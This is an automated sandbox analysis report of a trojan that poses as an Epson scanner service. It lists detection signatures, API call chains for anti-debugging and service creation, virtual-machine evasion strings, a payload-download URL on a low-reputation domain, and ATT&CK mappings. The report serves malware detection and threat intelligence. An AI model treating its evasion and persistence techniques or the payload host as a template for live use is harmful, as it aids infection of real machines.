Edit tour

Windows Analysis Report
escsvc64.exe

Overview

General Information

Sample name:	escsvc64.exe
Analysis ID:	1590615
MD5:	525ea9523a2afe76d2eaebc4a6b923eb
SHA1:	e0e30f49e82505caf9e7852a1071bbce81d8fcdc
SHA256:	53c772ca6258ee6a1d53be5e66554d0793f92c631760f1e3ed31366ef4fccba7
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Performs DNS queries to domains with low reputation

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

escsvc64.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\escsvc64.exe" MD5: 525EA9523A2AFE76D2EAEBC4A6B923EB)

WerFault.exe (PID: 7556 cmdline: C:\Windows\system32\WerFault.exe -u -p 7440 -s 420 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:21:00.415789+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	169.150.247.36	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: escsvc64.exe

Virustotal: Detection: 6%

Perma Link

Source: unknown

HTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.4:49733 version: TLS 1.2

Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb! source: escsvc64.exe
Source:	Binary string: C:\Users\Administrator\source\repos\Dll1\x64\Release\Dll1.pdb source: escsvc64.exe, escsvc64.exe, 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861709002.0000000180012000.00000002.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861552886.0000000002700000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb source: escsvc64.exe

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001460 CreateEventW,CreateEventW,RegisterDeviceNotificationW,SetServiceStatus,WaitForMultipleObjects,UnregisterDeviceNotification,CloseHandle,CloseHandle,

0_2_0000000140001460

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_0000000140003FEC
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_000000014000420E
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_0000000140004012
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rcx, qword ptr [rbx]	0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_00000001400040A9
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_0000000140004112
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	0_2_000000014000438B
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 4x nop then or byte ptr [rax-01h], 00000008h	0_2_0000000140005390

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.dssdhome.xyz

Source: Joe Sandbox View

IP Address: 169.150.247.36 169.150.247.36

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 169.150.247.36:443

Source: global traffic

HTTP traffic detected: GET /11/xin/escsvc64.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2Host: www.dssdhome.xyz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /11/xin/escsvc64.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2Host: www.dssdhome.xyz

Source: global traffic

DNS traffic detected: DNS query: www.dssdhome.xyz

Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.0000000000514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dssdhome.xyz/
Source: escsvc64.exe, 00000000.00000002.1859925957.000000000049B000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dssdhome.xyz/11/xin/escsvc64.jpg
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dssdhome.xyz/11/xin/escsvc64.jpg.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733

Source: unknown

HTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.4:49733 version: TLS 1.2

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001890 OpenSCManagerW,OpenServiceW,ControlService,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,

0_2_0000000140001890

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000F210	0_2_000000014000F210
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000EA40	0_2_000000014000EA40
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000BE40	0_2_000000014000BE40
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140003040	0_2_0000000140003040
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140008E50	0_2_0000000140008E50
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007450	0_2_0000000140007450
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140001460	0_2_0000000140001460
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140009660	0_2_0000000140009660
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000C460	0_2_000000014000C460
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140001C90	0_2_0000000140001C90
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140002090	0_2_0000000140002090
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000DCB0	0_2_000000014000DCB0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140008D00	0_2_0000000140008D00
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000B7C0	0_2_000000014000B7C0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_00450040	0_2_00450040
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_004514F8	0_2_004514F8
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_004511A8	0_2_004511A8
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0045A230	0_2_0045A230
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_00000001800015D0	0_2_00000001800015D0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000180001280	0_2_0000000180001280

Source: C:\Users\user\Desktop\escsvc64.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 420

Source: escsvc64.exe

Static PE information: invalid certificate

Source: escsvc64.exe

Binary or memory string: OriginalFilename vs escsvc64.exe

Source: classification engine

Classification label: mal52.troj.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: GetModuleFileNameW,OpenSCManagerW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,

0_2_0000000140001620

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_00000001400024A0 Sleep,CoInitialize,CoCreateInstance,Sleep,CoUninitialize,

0_2_00000001400024A0

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,

0_2_0000000140001080

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,		0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000180001C10 StartServiceCtrlDispatcherW,		0_2_0000000180001C10

Source: C:\Windows\System32\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\58de44fc-63f4-47f5-920f-ed4301cdf88a

Jump to behavior

Source: escsvc64.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\escsvc64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: escsvc64.exe

Virustotal: Detection: 6%

Source: escsvc64.exe	String found in binary or memory: /INSTALL
Source: escsvc64.exe	String found in binary or memory: /INSTALL/START/REMOVEEpsonScanSvcEpson Scanner ServiceSOFTWARE\WOW6432Node\EPSON\EPSON ScanSupported,SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%sEventNumEventAppNameEventAppPath%s,%dWIN_DIR1%s\%sPROGx86_DIR0ProgramFiles(x86)PROG_DIR<unknown>EsDevApp.exeRSDSV

Source: unknown	Process created: C:\Users\user\Desktop\escsvc64.exe "C:\Users\user\Desktop\escsvc64.exe"
Source: C:\Users\user\Desktop\escsvc64.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 420

Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Section loaded: userenv.dll	Jump to behavior

Source: escsvc64.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: escsvc64.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb! source: escsvc64.exe
Source:	Binary string: C:\Users\Administrator\source\repos\Dll1\x64\Release\Dll1.pdb source: escsvc64.exe, escsvc64.exe, 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861709002.0000000180012000.00000002.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861552886.0000000002700000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb source: escsvc64.exe

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_000000014000CF60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000000014000CF60

Source: escsvc64.exe

Static PE information: real checksum: 0x28b76 should be: 0x2d375

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_00000001400079EC push rdx; ret	0_2_0000000140007A01
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007BFA push rdx; ret	0_2_0000000140007C01
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007AE7 push rdx; ret	0_2_0000000140007AF1
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007976 push rdx; ret	0_2_00000001400079C9
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140007B77 push rdx; ret	0_2_0000000140007B79
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_00468086 push ecx; retf 003Fh	0_2_004680E6

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,

0_2_0000000140001080

Source: C:\Users\user\Desktop\escsvc64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\escsvc64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\escsvc64.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-18716

Source: C:\Users\user\Desktop\escsvc64.exe

API coverage: 7.0 %

Source: C:\Users\user\Desktop\escsvc64.exe TID: 7456

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1859925957.000000000049B000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH`
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\escsvc64.exe

API call chain: ExitProcess graph end node

graph_0-18717

Source: C:\Users\user\Desktop\escsvc64.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140004A40 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0000000140004A40

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_000000014000CF60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000000014000CF60

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_00000001400032A0 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00000001400032A0

Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140004A40 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0000000140004A40
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140004AE0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0000000140004AE0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_000000014000E7D0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000000014000E7D0
Source: C:\Users\user\Desktop\escsvc64.exe	Code function: 0_2_0000000140002BE0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0000000140002BE0

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: GetLocaleInfoA,

0_2_000000014000DF90

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_0000000140008860 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0000000140008860

Source: C:\Users\user\Desktop\escsvc64.exe

Code function: 0_2_00000001400032A0 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00000001400032A0

Source: C:\Users\user\Desktop\escsvc64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	14 Windows Service	14 Windows Service	2 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
